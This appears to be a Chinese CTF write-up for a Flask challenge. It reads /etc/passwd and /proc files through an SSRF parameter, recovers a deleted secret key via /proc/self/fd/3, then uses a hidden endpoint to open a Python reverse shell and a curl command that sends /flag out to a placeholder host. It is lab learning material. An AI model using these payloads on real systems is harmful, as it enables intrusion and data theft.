专业团队高端网站制作门户网站优化方案
常见读取路径
/etc/passwd=====一些用户和权限还有一些乱七八糟的
/proc/self/cmdline=====包含用于开始当前进程的命令
/proc/self/cwd/app.py======当前工作目录的app.py
/proc/self/environ=====包含了可用进程的环境变量
/proc/pid/exe =====包含了正在进程中运行的程序链接;
/proc/pid/fd/ =====这个目录包含了进程打开的每一个文件的链接;
/proc/pid/mem =====包含了进程在内存中的内容;
/proc/pid/stat =====包含了进程的状态信息;
/proc/pid/statm =====包含了进程的内存使用信息。
非预期解:url=/flag 出flag
网站功能:
<html>
<meta http-equiv="refresh" content="0;url=http://www.baidu.com/">
</html>网站功能:刷新界面并跳转到百度读取passwd
读取环境变量
/proc/self/environself位置为PID:代表进程 ID(Process ID),是系统为每个正在运行的进程分配的唯一标识符若一个进程的 ID 是 1234,那么该进程的相关信息就存储在 /proc/1234 目录下
环境变量里面的 PWD=/app 这里告诉我们这是在/app目录下进行的
该环境变量表示 当前工作目录(Present Working Directory),即进程所在的文件系统路径。
/app是当前进程的根目录或应用程序的主目录(常见于容器化环境,如 Docker)。当用户在终端中执行命令时,默认操作路径即
PWD的值。
读取启动当前进程的完整命令
/proc/self/cmdline
读取app.py文件:
/proc/self/cwd/app.pycwd 代表 “Current Working Directory”(当前工作目录)from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllibapp = Flask(__name__)SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)@app.route('/')
def index():return render_template('search.html')@app.route('/page')
def page():url = request.args.get("url")try:if not url.lower().startswith("file"):res = urllib.urlopen(url)value = res.read()response = Response(value, mimetype='application/octet-stream')response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'return responseelse:value = "HACK ERROR!"except:value = "SOMETHING WRONG!"return render_template('search.html', res=value)@app.route('/no_one_know_the_manager')
def manager():key = request.args.get("key")print(SECRET_KEY)if key == SECRET_KEY:shell = request.args.get("shell")os.system(shell)res = "ok"else:res = "Wrong Key!"return resif __name__ == '__main__':app.run(host='0.0.0.0', port=8080)补充一点urllib的知识
python2中urllib的urlopen可以直接通过文件路径读取文件
漏洞所在处
SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)文件描述符未关闭:代码打开文件后未显式关闭,导致文件描述符在os.remove()时可能仍处于打开状态。已删除文件的可读性:在Unix系统中,若文件被删除但有进程仍持有其文件描述符,可通过/proc访问该描述符读取内容。正常情况下应该是用f.close()
或者用with语句自动实现文件描述符的关闭
如:with open(SECRET_FILE) as f:SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE) # 确保在文件关闭后删除关于文件描述符
文件描述符是什么:
文件描述符(File Descriptor)是操作系统分配给已打开文件的“临时编号”(类似你去银行办事时拿到的排队号码)。程序通过这个编号操作文件(读/写)。
文件描述符未关闭会发生什么:
当一个程序(如 Python 脚本)打开了一个文件(如 open("/tmp/secret.txt")),但未显式调用 f.close() 或未使用 with 语句自动关闭文件时,操作系统会认为该文件仍被占用(仍然在使用中)。此时,即使代码中调用了 os.remove(SECRET_FILE) 删除了文件,实际文件内容仍可能通过未关闭的文件描述符被读取到(其内容仍会残留在磁盘上)。
我们可以通过访问/proc/self/fd/<文件描述符>来访问某个特定的文件
怎么获取这次的文件描述符:
。。。枚举
获取key
/proc/self/fd/3fd为文件描述符(file descriptors)
输入key并执行命令,但是没有回显,此时考虑到反弹shell
第一种解法:python反弹shell
注意:这里的key和shell需要经过url编码!因为key中会存在+/=等符号,需要编码后才行
编码前
/no_one_know_the_manager?key=5MMmHXw5q5FzvNFORsDKnImPBRHbcZ9MlLNHIviypt0=&shell=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxxxxxxxx",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'编码后
/no_one_know_the_manager?key=5MMmHXw5q5FzvNFORsDKnImPBRHbcZ9MlLNHIviypt0%3D
&shell=python%20%2Dc%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket%2Esocket%28socket%2EAF%5FINET%2Csocket%2ESOCK%5FSTREAM%29%3Bs%2Econnect%28%28%22xx%2Exxx%2Exxx%2Exx%22%2C8888%29%29%3Bos%2Edup2%28s%2Efileno%28%29%2C0%29%3B%20os%2Edup2%28s%2Efileno%28%29%2C1%29%3B%20os%2Edup2%28s%2Efileno%28%29%2C2%29%3Bp%3Dsubprocess%2Ecall%28%5B%22%2Fbin%2Fsh%22%2C%22%2Di%22%5D%29%3B%27腾讯云服务器的一些问题
第一次整服务器遇到一些困扰我的问题,浅写一下这次是怎么解决的:
问题一:端口是4567或者3333在bp中发送请求的时候一直不行,半天没回应
换成8888,我也不知道为啥我这只有8888能成功。。。明明其他端口的防火墙都放开了。。
问题二:如图,是困扰我最久的一个
8888端口已经被占用了,一查还是宝塔面板占用的,你要是把它kill掉吧,你的宝塔面板一转头又有新的进程了,怎么杀都杀不死
杀不死咱就绕过嘛嘿嘿,宝塔面板默认端口是8888,把它改成其他的
然后8888就能正常监听啦
问题三:怎么结束监听
无意间摁了个 control+C 然后自己结束了。。?
踏马的,终于反弹出来了,终于看到这个Connection received了。遥想当年青龙组那道note题反弹了一个星期都没反弹个p出来,激动的要掉小珍珠了
第二种解法:curl反弹shell
注意还是要编码 还要base64编码输出,不编码就输出不出来(为啥)
/no_one_know_the_manager?key=5MMmHXw5q5FzvNFORsDKnImPBRHbcZ9MlLNHIviypt0%3D&shell=curl%20xxxx:8888/`cat%20/flag|base64`命令自己改
